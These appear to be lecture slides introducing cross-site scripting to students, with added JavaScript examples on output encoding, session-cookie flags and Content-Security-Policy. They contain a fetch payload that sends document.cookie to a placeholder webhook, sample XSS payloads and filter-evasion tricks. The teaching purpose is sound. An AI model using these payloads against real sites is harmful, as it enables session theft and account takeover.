## Extended Lecture Week 3

### Cross Site Scripting (XSS)

### Hello I am not Kris :)

---

## Briefly - `whoami`

* Jesse Merhi (Like that plant + "he")
* Product Security @ Atlassian
* I tutor this course and 6443 (web apps)
* Kris is sick (like the bad kind)

--

## Alright, COMP3900, what's it about?

--

## I was kidding

--

## No he wasn't, he actually thought he was teaching 3900

--

## Reminder about DBAD (Don't be a ...)

- In week 1 we had tables dropped, and challenges broken (I will show you if you want lol).
- In week 2 it was pretty tame.
- This week we potentially have another case of DBAD

--

## What is legal by law

```python
FOO = "fake admin"
```

- Stealing FOO sessions
- Stealing FOO credentials
- Asking Kris (FOO) what a JWT is in the next lecture
- Anything that doesn't impact another student :)

--

## Please don't ruin the experience for other people.

## If you want to experiment, do so on your own hardware :)

--

## Questions, Queries, Qoncerns?

---

# Onto XSS

--

## What we need to know

1. Basic Programming (Bonus points if it is Javascript)
2. HTML
3. ~~Your credit card number~~

--

## Who here knows what HTML is?

--

HTML is just a funky way to define boxes on a website. For example, what does this look like?

```html
<div style="background-color:blue;text-align:center;">
  Box
</div>
```

--

<div style="background-color:blue;text-align:center;">
  Box
</div>

--

What about this?
```html
<div style="background-color:blue;text-align:center;">
  Box
</div>
<div style="background-color:red;text-align:center;">
  Box
</div>
```

--

<div style="background-color:blue;text-align:center;">
  Box
</div>
<div style="background-color:red;text-align:center;">
  Box
</div>

--

## This can get a bit crazy

<div style="background-color:blue;text-align:center;">
  <div style="background-color:green;text-align:center;margin:20px;">
    Box
  </div>
  <div style="background-color:pink;text-align:center;margin:20px;">
    Box
  </div>
</div>
<div style="background-color:red;text-align:center;">
  Box
</div>

--

### *Jesse shows the class how to open dev tools and look at boxes*

--

## Just a bunch o' boxes (crazy stuff)

---

### Back to what we need to know

---

Who knows Python?

--

Who knows C?

--

Who knows Java?

--

Does anyone here not know any of these?

--

Great, so if you know basically any programming language, you are halfway there.

---

## What is Javascript?

---

## Actually, does anyone here know?

--

### Javascript is like most other languages

- But it's (mostly) used in a browser.
- Pretty much every website you have visited has some sort of javascript on it.
- My website has javascript *Jesse presses the theme button*
- The main difference is that it is designed with browser and webpage interaction in mind.

--

Demo Time

[https://github.com/jesse-merhi/xss-sqli-demo](https://github.com/jesse-merhi/xss-sqli-demo)

--

### Secure commenting site

- You can securely comment
- You can even HTML things, which is nice
- How does this work? Go to the repo to find out :)
- Melon originally wrote it (thanks melon)

---

### Javascript Console

---

- Javascript is super similar to python
- The console lets you run individual LINES of javascript.
- VERY similar languages

```python
# In Python we do
print("Hello World")
```

```javascript
// In Javascript we do
console.log("Hello World");
```

--

- Javascript is designed to interact with a browser!
- Some cool things you can do:

```javascript
// Send the current tab somewhere else
document.location = "https://www.google.com";
// Open the browser's print dialog
print("JESSE");
// Paint every element on the page red
document.querySelectorAll("*").forEach((element) => {
  element.style.backgroundColor = "red";
});
```

---

What is the `<script>` tag?

--

We can make javascript run on someone else's computer!

---

## QUESTIONS?

---

### Cross Site Scripting (XSS)

---

## [Self-Retweeting Tweet](https://www.youtube.com/watch?v=zv0kZKC6GAM)

--

## Here is another one

### [https://jmerhi.mov/bad](https://jmerhi.mov/bad)

--

XSS is basically any vulnerability that allows javascript to run on someone else's computer.

- Stored XSS: Javascript that is stored (usually in a database) and is executed every time the page that shows it is loaded!
- Reflected XSS: Javascript that is carried in a link or request and echoed straight back into the page when it is opened

--

DOM BASED XSS (not assessable)

--

- Basically you are modifying the webpage in your XSS to trigger some things to happen.
- Not assessed.

--

- Stored XSS is really bad because it is **persistent**
- Reflected is not as bad because it requires the user to do something (clicking a link perhaps).

--

## Back to the secrets page :)

---

## QUESTIONS?

---

### Sessions

What is a session?

*JESSE REALISES THAT HE IS LOGGED OUT OF GOOGLE*

[https://www.google.com/](https://www.google.com/)

---

### Stealing Sessions

```javascript
document.cookie;
```

```html
<!-- Attacker can steal all of my cookies and login as me! -->
<script>send_to_attacker(document.cookie)</script>
```

---

### Did someone say demo?
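--

### Added example: where the comment box goes wrong, and what actually fixes it

The rendering functions below are an added example written for these notes, not code from the lecture or from the xss-sqli-demo repo. They take a comment string and build the HTML three ways: the way a "you can even HTML things" comment box does it, the way a naive filter does it, and with output encoding. A small raw-tag check then runs over each result. The sample comments, including the split `<SCRscriptIPT>` tag that appears on the later "Breaking mitigations" slide, are constructed for the example.

```javascript
// Added example (not from the lecture or the xss-sqli-demo repo): how a
// comment box turns into stored/reflected XSS, and why output encoding is
// the mitigation that holds up where tag stripping does not.
// All inputs below are constructed for the example.

// Constructed sample comments: one honest one and three payload shapes from
// the slides (plain <script>, the split "<SCRscriptIPT>" trick, and an <img>
// with an event handler).
const SAMPLES = {
  plain: "Nice post, 5 < 10 right?",
  script: "<script>alert(1)</script>",
  split: "<SCRscriptIPT>alert(1)</SCRscriptIPT>",
  img: '<img src="x" onerror="alert(1)" />',
};

// 1. "You can even HTML things": raw concatenation. Whatever the comment
//    contains becomes markup. If it came from the database that is stored
//    XSS; if it came from the URL/query string it is reflected XSS.
function renderUnsafe(text) {
  return `<div class="comment">${text}</div>`;
}

// 2. A naive sanitiser that deletes the word "script". It handles the first
//    payload, but removing the substring once turns <SCRscriptIPT> into
//    <SCRIPT>, and it never looks at <img onerror> at all.
function renderStripped(text) {
  return `<div class="comment">${text.replace(/script/gi, "")}</div>`;
}

// 3. Output encoding: every character that means something to the HTML
//    parser becomes an entity, so the browser displays the text instead of
//    interpreting it. This is the server-side counterpart of writing to
//    .innerText instead of .innerHTML.
const HTML_ENTITIES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ENTITIES[ch]);
}
function renderEncoded(text) {
  return `<div class="comment">${escapeHtml(text)}</div>`;
}

// Review check: does the rendered comment body still contain a raw tag the
// browser would parse? Strips the known wrapper, then looks for "<" followed
// by a letter, or "</" followed by a letter. Good enough as a smoke test on
// fixed output; it is not an HTML parser.
function bodyHasRawTag(html) {
  const body = html.replace(/^<div class="comment">/, "").replace(/<\/div>$/, "");
  return /<\/?[a-z]/i.test(body);
}

// Stand-alone run: print which renderer leaks markup for each sample.
if (typeof require !== "undefined" && require.main === module) {
  for (const [label, input] of Object.entries(SAMPLES)) {
    console.log(
      label.padEnd(7),
      "unsafe:", bodyHasRawTag(renderUnsafe(input)),
      "stripped:", bodyHasRawTag(renderStripped(input)),
      "encoded:", bodyHasRawTag(renderEncoded(input)),
    );
  }
}
```

Run it with `node` and the table shows the pattern the mitigation slides are about: the stripped version only clears the one shape it was written for, while the encoded version never emits a raw tag and still displays the honest comment (`5 &lt; 10`) correctly.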
---

```html
<script>
  fetch("webhookurl?" + document.cookie)
</script>
```

---

### Some example XSS Payloads:

```html
<script>alert(1)</script>
<script>console.log("haqd")</script>
<script>print("haqd")</script>
<img src="x" onerror="alert(1)" />
```

---

### Some good resources

* [PayloadAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20Injection)
* [OWASP Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html)
* [HackTricks](https://book.hacktricks.xyz/pentesting-web/xss-cross-site-scripting)
* [PortSwigger](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet)

---

### MY COOKIES!!!!

---

### Oh well...

---

## Mitigating XSS

---

### Basic WAF stuff

* *Sanitisation*: stripping out unsafe tags/attributes
  * `<script>alert(1)</script>` → `alert(1)`
* *Encoding*: escaping control characters
  * `<>` → `&lt;&gt;`
* *Validation*: allow/block-listing of content
  * block requests if you detect bad content

--

### Don't use raw user input

* `.innerHTML` treats content as HTML (control)
* use `.innerText`, which treats it as data
* sanitise your input with a library (DOMPurify???)
* don't write vanilla JS, use a framework.
* again, even if you use a framework, make sure the functions you're using sanitise the input

--

### Breaking mitigations

* Content stripped/blocked
  * embed dummy characters: `<SCRscriptIPT>`
  * use alternating case: `<ScRiPt>`
  * different tag: `<img onerror=...>`
  * different event handler: `<body onload=...>`

[here's a couple more](https://github.com/payloadbox/xss-payload-list)

---

### Protecting those cookies (SameSite)

* *None*: Cookies are always sent
* *Lax*: (default) not sent cross-site
  * images/iframes: *`no`*
  * navigation (GET): *`yes`*
* *Strict*: Cookies aren't sent cross-site at all, not even on navigation

> read more [here](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Set-Cookie/SameSite)

---

## In Short

1. Filter input on arrival
2. Encode data on output
3. Use appropriate response headers (tell the browser how to interpret content)
4. Content Security Policy

---

### Bonus: Bug Bounties if you find something cool

- https://bugcrowd.com/engagements/atlassian
- https://hackerone.com/riot?type=team
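---

### Added example: the headers behind points 3 and 4

The helpers below are an added example for these notes, not the lecture's or any project's code. They cover the two headers that decide what a successful XSS can do with a session: a parser and audit for a session `Set-Cookie` value (HttpOnly, Secure, SameSite), a builder for the value a login response should send, and a check of whether a Content-Security-Policy would refuse an injected inline `<script>`. The cookie values and the `https://cdn.example.com` origin are constructed for the example.

```javascript
// Added example (not from the lecture): the response headers that limit what
// a successful XSS can do with a session.
//   - Set-Cookie: HttpOnly keeps document.cookie from reading the session,
//     Secure keeps it off plain HTTP, SameSite limits cross-site sending.
//   - Content-Security-Policy: a script-src without 'unsafe-inline' makes the
//     browser refuse an injected <script>alert(1)</script>.
// Every header value below is constructed for the example.

// Parse one Set-Cookie header value into {name, value, attrs}. Attribute
// names are case-insensitive, so they are lower-cased for lookup.
function parseSetCookie(header) {
  const [pair, ...rest] = header.split(";").map((s) => s.trim());
  const eq = pair.indexOf("=");
  const attrs = {};
  for (const part of rest) {
    if (!part) continue;
    const i = part.indexOf("=");
    const key = (i === -1 ? part : part.slice(0, i)).toLowerCase();
    attrs[key] = i === -1 ? true : part.slice(i + 1);
  }
  return { name: pair.slice(0, eq), value: pair.slice(eq + 1), attrs };
}

// Audit a session cookie the way a reviewer would. Returns the list of
// problems; an empty list means the flags are as tight as they get.
function auditSessionCookie(header) {
  const { attrs } = parseSetCookie(header);
  const problems = [];
  if (!attrs.httponly) problems.push("missing HttpOnly: document.cookie (and any XSS) can read it");
  if (!attrs.secure) problems.push("missing Secure: sent over plain HTTP");
  const sameSite = String(attrs.samesite || "").toLowerCase();
  if (!sameSite) problems.push("no explicit SameSite: relying on the browser default");
  if (sameSite === "none") {
    problems.push("SameSite=None: sent on every cross-site request");
    if (!attrs.secure) problems.push("SameSite=None is only accepted together with Secure");
  }
  return problems;
}

// Build the Set-Cookie value a login response should send. Name and value are
// restricted to token characters so a stray ";" cannot smuggle in attributes.
function sessionCookie(name, value, sameSite = "Lax") {
  if (!/^[\w-]+$/.test(name) || !/^[\w.-]+$/.test(value)) throw new Error("invalid cookie token");
  if (!["Lax", "Strict"].includes(sameSite)) throw new Error("session cookies should be Lax or Strict");
  return `${name}=${value}; Path=/; HttpOnly; Secure; SameSite=${sameSite}`;
}

// Serialise a CSP from a map of directive -> source list.
function buildCsp(directives) {
  return Object.entries(directives)
    .map(([name, sources]) => `${name} ${sources.join(" ")}`)
    .join("; ");
}

// Would this policy block an injected inline <script>? Inline script is
// refused unless script-src (or default-src as its fallback) lists
// 'unsafe-inline'. A nonce or hash only allows the page's own scripts, so it
// still counts as blocking injected ones. No script directive at all means
// no protection. ('unsafe-inline' next to a nonce is ignored by modern
// browsers; this check deliberately takes the conservative reading.)
function cspBlocksInlineScript(cspHeader) {
  const directives = {};
  for (const d of cspHeader.split(";")) {
    const [name, ...sources] = d.trim().split(/\s+/).filter(Boolean);
    if (name) directives[name] = sources;
  }
  const scriptSrc = directives["script-src"] || directives["default-src"];
  if (!scriptSrc) return false;
  return !scriptSrc.includes("'unsafe-inline'");
}

// Stand-alone run: audit a weak and a hardened cookie, then two policies.
if (typeof require !== "undefined" && require.main === module) {
  console.log(auditSessionCookie("session=abc123"));
  console.log(auditSessionCookie(sessionCookie("session", "abc123")));
  console.log(cspBlocksInlineScript(buildCsp({ "default-src": ["'self'"], "script-src": ["'self'", "https://cdn.example.com"] })));
  console.log(cspBlocksInlineScript("script-src 'self' 'unsafe-inline'"));
}
```

The audit is what to run over a login response during a review: a bare `session=abc123` comes back with three findings, while the value `sessionCookie` builds comes back clean. The CSP check is the same idea for point 4: encoding on output stops the injection from becoming markup, and a script-src without `'unsafe-inline'` is the browser-side backstop if something slips through.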